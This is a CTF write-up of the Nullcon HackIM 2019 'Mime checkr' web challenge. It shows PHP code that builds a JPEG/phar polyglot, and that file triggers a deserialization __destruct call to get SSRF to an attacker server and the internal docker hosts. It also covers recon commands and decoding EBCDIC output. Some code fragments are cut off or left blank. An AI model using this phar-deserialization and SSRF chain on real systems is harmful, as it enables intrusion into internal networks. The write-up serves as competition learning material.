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HackIM 2019 / Mime checkr

Hello guys, so this time i played Nullcon HackIM 2019 , it was really amazing CTF where all web task was bit hards with new technique which need more knowledge to pwn it

Anyway, we did our best to clean the entire web, miss the last but we did it well :)

So lets start explain our solution for this task “mime checkr” 500 pts

First think to do when you get web task should always doing recon stuff (brute force directories and files in websites & Port scan …)

So I quickly launched dirsearch to check directories and hidden files, but no results, all we know is that there are 2 files /upload.php & /getmime.php and the folder in which our files are uploaded /uploads

Lets see what we can do here

1-Can upload file "need to be only image" and we get as result random_name.jpeg exp : 0e98960a815d51af41f10ab6f4642753.jpeg  
2-Can check file mime type by sending file path exp : uploads/0e98960a815d51af41f10ab6f4642753.jpeg

By the time we know that there should be something missing in their code that can break all this application :)

What can be done at the moment, we can bypass the verification of downloaded images by simply adding the image header (jpg / gif ..) and put what we want (php code), but we still can not control file extension that does not give us any result

So, if we add “GIF89a;” at the top of any file and the content is php code we get our downloaded file

But as we said , its not possible until we can control the extension type (can’t exploit null byte injection ) fixed on php 5.3.4

We come up to no solution and we have only 3h to pwn this shitty task !!!

In that moment we start to look again hidden files ! fired up nmap with http-backup-finder script , maybe we can get something ( hope so )

using : nmap --script=http-backup-finder

And yes we got something :D, There was backup file there /getmime.bak ,really missed this one !

Lets go ! no more time and we need to exploit it

//ini_set('display_errors', 'On');

class CurlClass{
    public function httpGet($url) {
    $ch = curl_init();  
//  curl_setopt($ch,CURLOPT_HEADER, false); 
    return $output;

class MainClass {

	public function __destruct() {
        $this->why =new CurlClass;
        echo $this->url;
        echo $this->why->httpGet($this->url);



OK here we go !

Nothing weird for now , as we can’t control the httpGet we can’t exploit SSRF there ! But wait at BlackHat 2018 event , @_s_n_t & @orange_8361 present a technique for triggering an unserialize within a phar archive. (check here https://www.youtube.com/watch?v=PqsudKzs79c)

So using his technique we can unserialization vulnerability possible even without unserialize :)

We can set the metadata of a phar archive with an non-instantiated class. which means using this simple code

$phar = new Phar('test.phar');
$phar->addFromString('test.txt', 'text');
$phar->setStub("<?php __HALT_COMPILER(); ? >");

class MainClass {}
$object = new MainClass;
$object->url = 'http://my_server_ip';

we create phar file ,what this means is that if we can do getimagesize(‘phar://some/phar.jpg’); then we can trigger a __destruct call (Yes we can do that , as the source code use getimagesize to check file mime type )

And in getmime.php there was MainClass which call httpGet($url) that means if we can call __destruct we control httpGet :D

And yes we have our famous SSRF attack ON guys!

Lets the pwn it now, but wait we need a valid phar file, that means we have to hide the phar as an image :)

$jpeg_header_size =
$phar = new Phar("test.phar");
$phar->setStub($jpeg_header_size." __HALT_COMPILER(); ?>");

class MainClass {}
$object = new MainClass;
$object->url = 'http://my_server_ip';


And yes if we test locally it works

its valid image file and valid phar file at the same time :) step 1 done

Next step :), need to gather internal information, Admin already mention its about container (docker)

So need to check docker default subnet and see maybe there is hidden App there !

When you install docker, by default it will create a bridged interface docker0 with a subnet for container networking

Means need to get which one will get us some result !

Start by as url

$jpeg_header_size =
$phar = new Phar("test.phar");
$phar->setStub($jpeg_header_size." __HALT_COMPILER(); ?>");

class MainClass {}
$object = new MainClass;
$object->url = '';


Mime check post data : phar://uploads/file_name.jpeg

Give us back the same web app

So == Web task,need to dig more and find something else

moved to give us new hint for the next step

Change url :

$object->url = '';

Which give us something not printable using code page charset :( , browser can’t render it back :(

File is not an image.'\xc8\x85\x93\x93\x96@a\x86\x85\xa3\x83\x88\xa1l\xad\xbd_|]M@@\x94\x85'

We need to brute force all possible charset and get the result , we get some clear text using CPXXX encoding charset

Its look like Hello /fetch~’string-garbage’ me

So until here we need just to try using one of this result (encode garbage stuff) and send SSRF request again

lets try with CP1047 Hello /fetch~%[]^@)( me, urlencode this /%66%65%74%63%68%7e%25%5b%5d%5e%40%29%28 (else we get Bad request from server)

$jpeg_header_size =
$phar = new Phar("test.phar");
$phar->setStub($jpeg_header_size." __HALT_COMPILER(); ?>");
class MainClass {}
$object = new MainClass;
$object->url = '';


And yes we got last one :)

File is not an image.'\xc6\x93\x81\x87\xc0\xd7\xc8\xd7m\xe2\xa3\x99\x85\x81\x94\xa2m\x81\x99\x85m\xa3\xf0\xf0m\xd4\x81\x89\x95\xe2\xa3\x99\x85\x81\x94\xf0\xd0'

So our last step will be to decode ‘\xc6\x93\x81\x87\xc0\xd7\xc8\xd7m\xe2\xa3\x99\x85\x81\x94\xa2m\x81\x99\x85m\xa3\xf0\xf0m\xd4\x81\x89\x95\xe2\xa3\x99\x85\x81\x94\xf0\xd0’ using same charset CP1047

import ebcdic
url = '\xc6\x93\x81\x87\xc0\xd7\xc8\xd7m\xe2\xa3\x99\x85\x81\x94\xa2m\x81\x99\x85m\xa3\xf0\xf0m\xd4\x81\x89\x95\xe2\xa3\x99\x85\x81\x94\xf0\xd0'.decode("cp1047")
print url

And Yesss we got the FLAGGG


Really was nice task, different steps to finish it and the last step was really weird for us :( !

BTW this task was only solved by 4 teams , happy that our team is part of this : )

Thanks to the creators’s team for this CTF also for hosting this competition and Thank you for reading this write up too :D